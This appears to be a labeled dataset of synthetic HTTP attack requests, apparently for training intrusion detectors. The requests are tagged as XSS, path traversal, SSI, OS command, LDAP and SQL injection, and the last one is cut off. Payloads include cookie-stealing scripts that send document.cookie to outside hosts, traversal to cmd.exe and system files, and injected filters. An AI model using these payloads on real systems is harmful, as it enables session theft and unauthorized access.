GET /rYs6NDYW81xJZ/eGGiKAaYgYjP@V/ioinc2wtMd9r1niybr2A/nS8eIn/p@BofWeX90L/ra0mlkeoseznoeqp/eri3egwcawmtn9/hkF1uCttOCw8Y5TZP..php4?XWsQliWeKqW=8912691&B0dIKYscriptkB8tt=r6aeed%2Ftse9hd%2Fspszno%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D224%5D+++%7C++o%2Fr%2Fn2eqye%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D86%5D++++or++%27tnOC%27%3D+%27&nfrNfNettDtgXj=iSHRL9er HTTP/1.1
Host: 244.42.40.234
Connection: lwIni
Accept: */*;q=0.2
Accept-Charset: koi8-r;q=0.1, windows-1255;q=0.9, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Fri, 01 Jan 10 19:45:35 CET
ETag: "LurqXpLgf.Ql2zH"
Expect: lteNH=ieiARts;setA=dgrtRD
From: gH0ez@Sireoah.fr
If-Modified-Since: Mon, 26 Jun 06 01:49:26 GMT
If-Unmodified-Since: Mon, 30 Aug 04 10:26:00 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 0.7
Pragma: txP=lostFv
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Range: 205-0247
Referer: /baiv/erz1/nO8d/ptnbtk6.ace
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.7 (X11; U; Solaris 5.1; rc-ec; rv:0.6.4) Gecko/37094550
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: gzip
Upgrade: hljiT/5.4, axrst/8.8
Warning: 282 www.eOXt.htm "312bFgsaSoacoe" 
X-Forwarded-For: 43.11.206.228
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35807
Start - Id: 45485
class: PathTransversal
GET /03Zadminxterm./adsoabneot1ebhi/esn8oirH/rulm2vus9P..3sr6sMT.html?uhtgd=W%3B+Na6Y9tttpn4e&d3nu=l6Ty&teueearfelnplah=3939027&nTnl66old=lehkhmm&7etugesy=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Foltrde%2Fas%2Fasneet%2Forstngitte.swf&teteeeq=933030256&cSih8=566&nhr1aswoc=60640&o5FTLsystemiBaVs=glCE05ta&rdhdd7=1&uzq9passwdw=0&ryr=64x8k&tEesbguhtroeo8=%3Dehtaccesh%26a+Ris HTTP/1.0
Host: 60.219.231.210
Connection: ythg
Accept: */*
Accept-Charset: cp-936;q=0.6, iso-2022-jp;q=0.6, cp-936, x-mac-ce
Accept-Encoding: *;q=0.9
Accept-Language: 9e-W2oay;q=0.7, onfeuI-ed, jreE-1ntaCd9;q=0.3, taa-tUrigr6, 2Zv4me-i0eli;q=0.7
Cache-Control: min-fresh=1
Client-ip: 53.223.189.118
Cookie: QXMu6W7VzS-=2917286770
Cookie2: $Version="39"
Date: Mon, 04 Feb 08 02:05:15 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 01 Sep 07 04:58:09 CET
If-Unmodified-Since: Sun, 05 Nov 06 14:20:38 CET
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: *
If-Range: "KZt_3YzgCYNe3WW1QD"
Max-Forwards: 7994
MIME-Version: 3.1
Pragma: e=r3otnee
Proxy-Authorization: Digest username="hesa"
Authorization: NTLM YmhzbW5vbm40bW9vcmJ0ZXRwc3V0YnJ1b2l5cDN4cmljbGNleQ==
Range: 7-
Referer: /lheinA7f/azUv/ocll8.avi
TE: trailers
Trailer: Pragma
User-Agent: nagmlzSq
UA-CPU: PowerPC
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: 5.1 www.truEqua.gif, 1.2 www.oHurtr.shtml, FTP/9.4 www.oLlaoa.jpeg
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45485
Start - Id: 39585
class: SSI
GET /iljgatr/saH/oKeieafAsenle8fuE/wvUBAMgU0loptZ1x/sIushymnlru/nTpNwf2mU-/GElWqG/agpst1fvrKdrewnst/rt0r.jpeg?goq5SAinput-Zr=optscr%3Dnt&zaiat=7926295&eoeNyTtetoee=%3C%21--+%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&edlhp0enilazms=uhc1Dx&s6tVo7nh=otso4nre6d HTTP/1.1
Host: 46.123.225.104
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ttyita-ynnaoe, i-nuo;q=0.7, eReRy-breehhss
Cache-Control: no-store
Client-ip: 241.190.56.140
Cookie: od=gotl5epaEhiries9i;egtohsT3haet=Tfeutertge6touconnectc;fihhgoev= nsD;ianeetga=4021668
Cookie2: $Version="523"
Date: Wed, 11 Mar 09 16:41:58 CET
ETag: "QQaFNHDxvsmJsy85@QP"
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Thu, 18 Jun 09 14:46:06 CET
If-Match: "NT@HrC4H1m@vVr4OO"
If-Range: *
Max-Forwards: 9
Pragma: rnnehwl='m0n54'
Authorization: NTLM bW9vZDZyaW9pZW45Ym5oVGV5bzJlcmFlZWdIdXJncm8=
Range: 5591-,251722-40474
Referer: http://www.rhIknA1a.fr/zeshi/nnenc/btRiwts/oeeegt0/ct6broa.php3
User-Agent: Mozilla/4.2 (Windows; U; WinNT 8.8; hp-vh; rv:3.2.7) Gecko/84239670
UA-Disp: 779,442,32
UA-OS: Win98
Via: ltor/8.3 www.sbuSfoIf.jpg, 2.1 www.tisrQs.jpeg:2
Transfer-Encoding: deflate
Upgrade: oshili/5.5, wen/5.9
Warning: 816 90.205.210.114 "n6wratgRHtneatUce" "Sun, 10 Jun 07 18:21:41 GMT"

null

End - Id: 39585
Start - Id: 47493
class: XSS
GET /9X-yzZ5chumfPCQF/2EBqD3M/3dg7XCkceE77_69FR/tIRtWKZCz3Tf9jI/s6hz/istG0Rb/ttylea/lzmsa7istep.css?tPRnt=cw3sconnecti%3DpasswdiEc%7E&6niugc2eLswuiE=3072&8QpsconnectleOinputgps=node%2Fcl&2heihoidpeet=%26%3Cscript%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.malaat.com%2Fcgi-bin%2Fntlanare.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&ilc=snpucopsbleronnd&Stg3aogeshse=796009&er7tDuxHsegl=bM6&w6=jeAca HTTP/1.0
Host: 139.11.134.57:80
Connection: close
Accept: application/x-tar;q=0.6, video/*
Accept-Charset: windows-1253;q=0.0, windows-1253;q=0.2, us-ascii
Accept-Encoding: 
Accept-Language: d7Qrbt-3reei, dtstesw-hada;q=0.1, wl014tr-td2Cafn, Kp-rdeEr, ssd-caxfrr;q=0.7
Cache-Control: max-age=40
Client-ip: 229.228.100.156
Cookie: sznv= %u;rewm=525731634;httpg7y_A@G=itusaapenCg0a;hrtefi=mngsUeq5ttes
Cookie2: $Version="1"
Date: Sun, 11 Dec 05 13:03:38 CET
ETag: W/"NSxL_5tTC4DMTJwF"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Thu, 31 Jul 08 17:37:27 GMT
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: "JBDFJcp1Mn12B.t2W.h"
If-None-Match: "-d7mEccy.PWPKU7xY"
If-Range: *
Max-Forwards: 556
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: http://www.ysii.cz/o3taoA/th6p5qA/2ls7.htm
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/9.4 (X11; U; SunOS sun4u 5.7; en-6G; rv:8.9.0) Gecko/26794695
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 206x914
Via: HTTP/9.4 www.ejrn.htm:2, 1sr/9.7 www.drulhe.jpeg:1312, nemoo/7.5 201.208.252.6
Transfer-Encoding: identity
Upgrade: mrsd/9.5, owur/3.3
Warning: 377 www.ttf1aee.tiff:8 "utk7eeufto6reia" "Thu, 23 Jul 09 20:34:19 CET"
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47493
Start - Id: 45223
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 206.195.232.247
Connection: keep-alive
Accept: image/*, application/*;q=0.9
Accept-Charset: koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: nvheztn=sHr
Client-ip: 98.132.36.144
Cookie: co2toe1=so
Cookie2: $Version="85"
Date: Wed, 11 Apr 07 20:52:30 CET
ETag: W/"DXf974GhD9xDoRdK"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "SXfrru3q8yzDd1u2"
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 70
MIME-Version: 3.6
Pragma: ife='toyeU'
Proxy-Authorization: Digest qop=evai40
Authorization: cnbhtu lehoi0k=somsi
Range: -01750,762-,10389-0
Referer: /t8nfuaen/uCmWna/orrn/smpeoD.pdf
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/2.5 (compatible; Konqueror/4.9; Linux i586; iattnwn)
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: omOe
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 90.180.246.61
X-Serial-Number: 706890452941318
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45223
Start - Id: 44503
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tnmeHod.biz
Connection: close
Accept: video/*;q=0.6, image/*, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, identity, deflate, compress, gzip
Accept-Language: *;q=0.6
Cache-Control: max-age=5
Client-ip: 245.96.181.37
Cookie: laNufng=k;9gusrrj-.=eoqesnxary9f;utg=79;wfa4beV7B=rnio?olania
Cookie2: $Version="123"
Date: Sun, 08 Feb 04 01:42:40 CET
ETag: W/"MYr9ZmTiyD.S_ICN2G"
Expect: sfshsaRs=urgyr;h087du=rtocyehe
From: ciaeri@estekqcd.uk
If-Modified-Since: Mon, 10 May 04 10:11:48 CET
If-Unmodified-Since: Mon, 21 Feb 05 05:49:26 CET
If-Match: *
If-None-Match: "3owuL_Pw4tI2EKGv6k"
If-Range: Sun, 24 Aug 08 19:22:29 UTC
Max-Forwards: 085
MIME-Version: 8.2
Pragma: wd=vaec
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: http://duliahis.ch/abwaad/eJ8croot/0chinrh.jsp
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.2 (compatible; yyhtini; SunOS sun4u; awn8)
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 455x841
Via: usi/5.0 44.195.109.125
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44503
Start - Id: 48233
class: XSS
POST /6vqgD7j/h.ebc@LD1VeshGj/h5hWalPvHMYRLrMhfn/HwA0uCi@7SyHIRo/hMi0pL_eLVjpfQ.SOAq/adGD_v/rj/nZT9fp5V6tw-rBM/pNU9@v@_uR/accJso.oDqrYjv/3_Aecho@N.gif? HTTP/1.1
Content-Length: 288
Content-Language: omisgeer
Content-Encoding: identity
Content-Location: /haersDn.sh
Content-MD5: cnMyaHBlc25lcmF0c25sbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Mar 07 16:38:32 CET
Last-Modified: Tue, 23 Sep 08 06:15:19 CET
Host: www.evaiwes.gov:3
Connection: close
Accept: image/gif;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=069
Client-ip: 112.4.101.116
Cookie: itc=968453;a97=iyM-j2uF;ohe=gPj;dae4dzpt6ba6Sh=86292;hto=<img    src  =  "  livescript:[document.location.replace ('http://www.deer.com/cgi-bin/onnteral.cgi'+document.cookie);]     "   >
Cookie2: $Version="830"
Date: Tue, 09 Mar 10 05:57:42 GMT
ETag: W/"O4eyEimQ9o3CUxc2YQhb"
Expect: edjep=watar;Oneanh
From: SPnoemq6@oee6gw4s.com
If-Modified-Since: Sat, 14 Oct 06 04:55:32 UTC
If-Unmodified-Since: Fri, 07 May 04 13:34:20 CET
If-Match: *
If-None-Match: "X94cLYvnHhf_sf-VtrGE"
If-Range: Thu, 08 Apr 04 11:03:37 UTC
Max-Forwards: 0
MIME-Version: 7.2
Pragma: tot='gso6daup'
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Basic dXRhc3RkOmllZW9yOTN0
Range: 2-22075
Referer: http://mEx5nuu.org/tn5rwt/rmtango/cmiIIc/lido.jpeg
TE: trailers,trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 5.2; u2-ma; rv:8.8.2) Gecko/95129244
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 8720x676
Via: ataiah/7.6 44.8.18.9, HTTP/0.4 146.101.237.217:54405
Transfer-Encoding: compress
Upgrade: Eoge/5.5, mmGS/2.1, smtts/9.5
Warning: 639 58.161.54.103 "rfthnbr" "Sat, 26 Aug 06 16:57:10 CET"
X-Serial-Number: 60545098
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bxstfriha=o Amgordex7a $zsaps&Jiirootjweint=tslesEsdactaes7&nht6au=c&&ao2=enu(&cduhbeoOn9kdea=b2S9fAdv&ln3Z1ru1O=a9e&oeediNhnt0s=7&8TNW6=tnmn&betqocsenontdee=t&oedet=8&uEatpeHAadem=tdsKe13&RigoedEabopa=eublttn0di\woob&qr=Estyle1fulIacFeS<replaceErexecn&tllfolelynnrc=nHt8.Nx6xUE

End - Id: 48233
Start - Id: 47598
class: XSS
GET /azedFa/HatelpHP/dm5NaOmMgNRF/hs6erdngaomhn/srta6geOosanharxtpsj/aL/Oibnaru/msfha3sTdzwnwnrtas.asmx?TZQPQgPAxp_vLboot.ini=%3Cimg+++++src+%3D%22+++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.chiete.com%2Fcgi-bin%2Fse.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E HTTP/1.0
Host: 190.116.139.240
Connection: keep-alive
Accept: audio/basic;q=0.6, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 84.76.139.10
Cookie: qfPOgXVJ3l=goF3w147.;P366omuifteyt=rdsu
Cookie2: $Version="867"
Date: Mon, 22 Mar 10 15:37:55 GMT
ETag: "XH4fCPIuXxAhkkU"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 11 Sep 05 24:25:46 GMT
If-Unmodified-Since: Wed, 14 Oct 09 22:04:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0230
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: http://ipstw.be/xSneArT/3oaAi.sh
TE: chunked,gzip,chunked
Trailer: TE
User-Agent: diSw7qfs5 http://www.dciLosa.st
UA-CPU: MIPS
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0399x875
Via: 2.8 40.37.142.166, 6.3 www.sbremu.tiff, 9.6 62.131.43.5
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47598
Start - Id: 39321
class: SSI
GET /etxdpeiyo/p3wae1l8tapihEmoe.jpeg?seaqe7=9&75ilhifriekts=1277715&tinns=%3C%21--%23email+fromhost%3D%22www.RscaKepa.com%22+tohost%3D%22mailbox.ansHx.com%22+message%3D%22i9unln+sLtigna+teop+Hete%22+fromaddress%3D%22ehTe.com%22+toaddress%3D%22BOm.aw.com%22+subject%3D%22a%22+sender%3D%22ac.com%22+replyto%3D%22Oo6yenS.com%22+cc%3D%22t8%22+inreplyto%3D%223ih+ist+1tm%22+id%3D%22sdsamail%22+--%3E HTTP/1.1
Host: 232.116.248.158:80
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: iso-8859-1, windows-1252;q=0.4, x-mac-icelandic, iso-8859-2;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: SNoed-mes5;q=0.2, re3-wirq5Mh
Cache-Control: no-transform
Client-ip: 11.92.216.73
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="904"
Date: Tue, 27 Sep 05 12:32:12 GMT
ETag: "1pA1U.J7IAhA3yekD"
Expect: iinuem
From: iltesrft@iaCi.uk
If-Modified-Since: Mon, 26 Jan 09 23:37:04 CET
If-Unmodified-Since: Thu, 18 Dec 08 19:45:20 GMT
If-Match: *
If-None-Match: "qbykTVARIOjih1@L"
If-Range: "BA0pCKP6iZ1-BYghy"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest nc=2B5f14E5
Range: 326-,2201-0740,2-99478
Referer: /tmwl1/8tpv9in.js
TE: trailers,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 0.6; to-2f; rv:4.1.5) Gecko/32302695
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: eseht/3.5, trmE/1.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39321
Start - Id: 46358
class: PathTransversal
GET /t07ki4.YA2qQZV1.msf?-kk5@h=Etn0e&otrtd5oiae=nooriNo%26fessflu%3Ce%26&ero3h=ufSee0%29pliejas&GmKfspz.2Ms=octt0&gCa7lhm8kter=dcehn%7C&wrbatoDpz=1195113645&CTboot.iniR.en=o&korgm=qen+wnlscIln&tcpe3=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&i3gteqe=yservicesnta2%7E+eb&men5rrteosc=46&4psmErschnbnm=537132398&ETd=54602&raanns=m5UeMndqdroptjdlsu HTTP/1.0
Host: 166.151.83.30:80
Connection: adatE
Accept: text/plain, video/*;q=0.5, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 191.28.125.93
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="8"
Date: Fri, 27 Jun 08 20:39:26 UTC
ETag: W/"7@bC0aVLxbOjP6v"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Thu, 25 Dec 08 09:58:03 UTC
If-Unmodified-Since: Sun, 10 Feb 08 14:41:51 GMT
If-Match: *
If-None-Match: "hNxmMUZYGc5pH6V"
If-Range: *
Max-Forwards: 10
MIME-Version: 1.9
Pragma: ettbtu='o'
Proxy-Authorization: NTLM bmFyZWU4dDJjVWU1dW5pY3FoZXBhMW1mOXRsRXBocnJ6c2hhbXNzc2FpbHdo
Authorization: bb0nne r9It=ukaor
Range: 405245-17797
Referer: http://www.5EFrei.be/reeth/mblanei.wmn
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 5.3; 9d-rq; rv:6.8.8) Gecko/86177796
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: 3.1 196.194.220.30
Transfer-Encoding: identity
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 337 www.rrrgcit.jpeg "oqkre1aytdaE" 
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46358
Start - Id: 37446
class: LdapInjection
GET /eZ_V/e4pKgId6C8QJs8R/ulkensMe4aNiT8noe5/7F/of0vR7/mOcusYvhWzO/samBexect1bV%uXyP9/dJYSi/iR1LcBbek/ok-nNpWMTbHa.php3?k9ueerdtncdeaou=ssNQMvwy%40sw&ei=137516&sBroaqareaesbr=NwFrexi8hxWca%2FcopyrRpe&340eshsqedt=t%2BtpXne&all=ifd3ooAnqgrhttn HTTP/1.0
Host: www.snes.ch
Connection: ntntpr6
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: emn-w5o5;q=0.8, k-elimahyq, obttk-obyswl;q=0.1, Etct9-l0llsl9s
Cache-Control: max-stale=559
Client-ip: 134.8.200.85
Cookie: ni6ee6y5a=995;KVOupdateZzaccess_log7O@0d=8175629;dTIyignstore5=")(targetfilter=(o=NetscapeRoot));tfi8n=sea6pRWm9derd
Cookie2: $Version="01"
Date: Tue, 09 Mar 10 21:11:10 CET
ETag: W/"d270caUDksMd6oQ"
Expect: 100-continue
From: O07auva@tiv1s.de
If-Modified-Since: Sat, 25 Apr 09 11:30:48 CET
If-Unmodified-Since: Mon, 17 Apr 06 16:16:47 GMT
If-Match: "IahhubUWOEjHRmc6y"
If-None-Match: "tmLbuGZL34ubDhKOghq"
If-Range: Mon, 24 Oct 05 14:50:53 GMT
Max-Forwards: 4
MIME-Version: 8.6
Pragma: e7picp=e29t3ao
Proxy-Authorization: NTLM bk1OOXNmaW1yN2d1ZWVoM2xpZTZlZWl0VnRvdGlxaGExZWZlbHVnZWZvcg==
Authorization: Digest uri=http://dd2dWqf.biz/R5h5n/8te3tal/Giecas.htm
Range: 09-,89735-685,29-440
Referer: http://www.serd.de/rsuxn/dR8el/eicE.tar
TE: trailers
Trailer: If-Range
User-Agent: nushe (tR2chF; e.mQQdLGGS)
UA-CPU: MIPS
UA-Disp: 3647,135,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3721x5671
Via: 8.5 4.159.147.175:2098, u9tim/4.9 216.72.193.157
Transfer-Encoding: gzip
Upgrade: o1te/3.9, e0te/6.5, 0estiY/4.9
Warning: 107 www.kmnp.shtml "spClae3utRiueiAamth" 
X-Forwarded-For: 157.150.92.233
X-Serial-Number: 9320114880
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37446
Start - Id: 45053
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 176.145.4.99
Connection: rTnN6hi
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.8, gzip;q=0.1, gzip;q=0.3, compress
Accept-Language: *
Cache-Control: foth=wesa9if
Client-ip: 69.142.236.19
Cookie: meicteezn7e=1091798;p9hEogta=04833025;fqADFy3viH=32934;XtjtMMB7wmeta3=c;sbann=061535;eaenYNa=Iatoalcioriire
Cookie2: $Version="8"
Date: Thu, 18 Mar 10 07:55:29 UTC
ETag: W/"tEDzViflK5b0IYZZ"
Expect: i6ael
From: Otai@40ezesm.uk
If-Modified-Since: Mon, 19 Jan 04 09:06:23 UTC
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "tTODK-x-3oWAOLEp9f"
If-None-Match: *
If-Range: "PI@x-7kSSup0PcP"
Max-Forwards: 67
Pragma: no-cache
Authorization: Basic aG5FbzplZ3N2YWls
Range: -6543,-6,-30
Referer: http://vxofon.it/arn9pEe/l0Peuudh/ebfdwPoA/s2tlre/tdhny.swf
Trailer: Host
User-Agent: Mozilla/4.6 (Windows; U; WinNT 0.6; tq-v5; rv:0.8.3) Gecko/66858798
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Via: 5.5 45.174.223.15, 6.7 235.194.161.181, 2.1 5.32.67.186
Transfer-Encoding: gzip
Upgrade: sLa/4.9
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45053
Start - Id: 47881
class: XSS
GET /dhrO4uyh/o7n/tlrw3taesi/n9Zsot4KqPc09Evxxi/pnUegR8NQ/udUP6e_HCwN46BT1eP/teteiuzels8jotFf/mOb32dstdinEA/1oGKZ.jpeg?aslel=N9DetmeEna&tiot1=la4+&rpenuaeh=%3Ca++++href+%3D++++%22++++javas%26%2399%3Bript%26%2335%3B%5Balert++%28%27vp5yprsei%27%29%3B%5D+%22+++%3E&tfoGliRnmoIg=odeiyoAzr7af HTTP/1.0
Host: 231.26.123.207
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: hz-gb-2312, iso-8859-6;q=0.3, windows-1250;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: aos-Le;q=0.3
Cache-Control: no-transform
Client-ip: 85.234.191.196
Cookie: yexupdatelYj@mv=o2i
Cookie2: $Version="24"
Date: Fri, 14 Jan 05 10:32:31 GMT
ETag: "g@pHW7UV-x7nc7Q"
Expect: tip8asB=nmhhe
From: briu78@sotkdsg.de
If-Modified-Since: Wed, 18 Jan 06 12:30:21 UTC
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: "pk5-mkIfox.3wj9.o"
If-Range: "M9@GgC3h9YJ5aOB"
Max-Forwards: 27
MIME-Version: 2.7
Pragma: bwtB='vorb'
Proxy-Authorization: Digest qop=auth
Authorization: vdotf1 rfhe=aone4
Range: 064-,-6198,422476-
Referer: /yshuon/71nL/artObr/hogltr.msf
TE: chunked
Trailer: Accept
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 1.2; mo-dc; rv:6.0.8) Gecko/32368742
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: FTP/8.2 www.ruyoae1.gif, 0.6 www.etee7.gif, HTTP/9.6 www.pscnT.jpg
Transfer-Encoding: compress
Upgrade: dglC/5.9, mee/7.3, oitlI/6.9, acmtu/7.6
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47881
Start - Id: 41983
class: SqlInjection
GET /nF-ZVPbyo/omWA_4R88MA-KA/aaCt/fk3zpLKeh-EXfH/npoBBBLT3SD/ly.uU83_sG6TdTb0h-z/n_z_8Tk7ypJ/et9fetahst/nmlardeni/hhreast5.asmx?eseerj=27594&tgunt6swYdp=r2&vbscriptzMZxiQK=tarsraoatacvdaa&athof=OR++++008929668%3D008929668 HTTP/1.0
Host: www.ee7uo5blh.it
Connection: NmsUgenw
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.1, macintosh
Accept-Encoding: 
Accept-Language: aheyuHce-r3aad, jli9-2itrona;q=0.9
Cache-Control: no-store
Client-ip: 41.133.176.17
Cookie: hcg=5375748072
Cookie2: $Version="9"
